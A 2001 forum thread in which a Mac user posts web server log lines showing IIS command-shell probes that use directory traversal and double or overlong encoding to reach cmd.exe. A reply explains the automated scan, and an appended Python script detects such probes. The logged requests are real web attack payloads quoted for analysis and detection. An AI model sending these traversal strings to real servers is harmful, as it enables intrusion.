Someone trying to hack my computer?

The Madhatter

Registered
I was the dude that posted the DivX movie apps package and I hosted it using Web Sharing in OS 9. I kept looking at the log to see how many people got the apps and what not, but I just looked at it and this is what I saw:

128.59.226.17 - - [10/DEC/2001:21:02:06 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 186
128.59.226.17 - - [10/DEC/2001:21:02:07 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 186
128.59.226.17 - - [10/DEC/2001:21:02:07 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 186
128.59.226.17 - - [10/DEC/2001:21:02:07 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 186
128.59.226.17 - - [10/DEC/2001:21:02:08 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 186
128.59.226.17 - - [10/DEC/2001:21:02:08 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 186
128.59.226.17 - - [10/DEC/2001:21:02:09 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 186
128.59.226.17 - - [10/DEC/2001:21:02:09 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 186

There was more, but I didn't wanna fill up the whole page. It appears to me like someone was trying to access the command line or root or something. I am guessing it was a hacker, planning on changing something or screwing up my comp. Am I right, cause if so that is quite interesting? Good thing he couldn't.
I searched a couple of places that let you look up IP addresses, but they all cost. Anyone know of any free ones?
Just curious, and thanks a lot for your help.
 
It was likely more what you'd call a script kiddie, running an automated search for well-known MS/IIS vulnerabilities (cmd.exe is the Windows DOS shell program, note all the 'winnt's and such in there...). More than likely he was running this from a 'kit' without really understanding what he's doing.

Given that you'd be running OS X/Apache, no cause for concern.

A fairly common tactic is to run a wide sweep of a block of IP addresses where one might reasonably expect to find misconfigured IIS servers - like the IP addresses allocated for residential users by big ISPs. You might want to report the activity and the originating IP address (assuming it wasn't faked) to your ISP - you might get the brat's Internet service cancelled in the end...
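Added example, not part of the thread: a small triage script for an access log like the one posted above. It tags IIS shell probes, directory traversal, nested percent-encoding and overlong UTF-8, then groups them by client IP and counts how many got a non-error response. The tag names and the final sample line are assumptions made for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# First four lines are from the log posted above; the last one is a
# constructed ordinary download so the scan has something to ignore.
SAMPLE_LOG = """\
128.59.226.17 - - [10/DEC/2001:21:02:06 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 186
128.59.226.17 - - [10/DEC/2001:21:02:07 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 186
128.59.226.17 - - [10/DEC/2001:21:02:09 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 186
128.59.226.17 - - [10/DEC/2001:21:02:09 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 186
203.0.113.9 - - [10/DEC/2001:21:05:00 -0600] "GET /divx/apps.sit HTTP/1.0" 200 51234
"""

# Common Log Format: host ident user [time] "METHOD url PROTO" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+$')

def classify(url):
    """Return the set of probe traits seen in one request URL."""
    tags, decoded, rounds = set(), url.lower(), 0
    # 0xC0 and 0xC1 are never valid UTF-8 lead bytes; they show up in
    # overlong encodings used to smuggle '/' or '\' past a path check.
    if re.search(r"%c[01]%[0-9a-f]{2}", decoded):
        tags.add("overlong-utf8")
    # Decode repeatedly; needing more than one pass means nested encoding.
    while rounds < 5:
        step = unquote(decoded, encoding="latin-1")
        if step == decoded:
            break
        decoded, rounds = step, rounds + 1
    if rounds > 1:
        tags.add("double-encoded")
    if re.search(r"\.\.[/\\]", decoded):
        tags.add("traversal")
    if re.search(r"(cmd|root)\.exe", decoded):
        tags.add("iis-shell-probe")
    return tags

def scan(log_text):
    """Group probe requests by client IP; 'served' counts non-error replies."""
    hits = defaultdict(lambda: {"requests": 0, "served": 0, "tags": set()})
    for line in log_text.splitlines():
        m = CLF.match(line)
        tags = classify(m.group(2)) if m else set()
        if not tags:
            continue
        rec = hits[m.group(1)]
        rec["requests"] += 1
        rec["served"] += int(m.group(3)) < 400
        rec["tags"] |= tags
    return dict(hits)

if __name__ == "__main__":
    for ip, rec in scan(SAMPLE_LOG).items():
        print(ip, rec["requests"], rec["served"], sorted(rec["tags"]))
```

A `served` count of zero, as with the all-404 lines in this thread, means none of the probes found anything; any non-zero value is the entry to look at first.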
 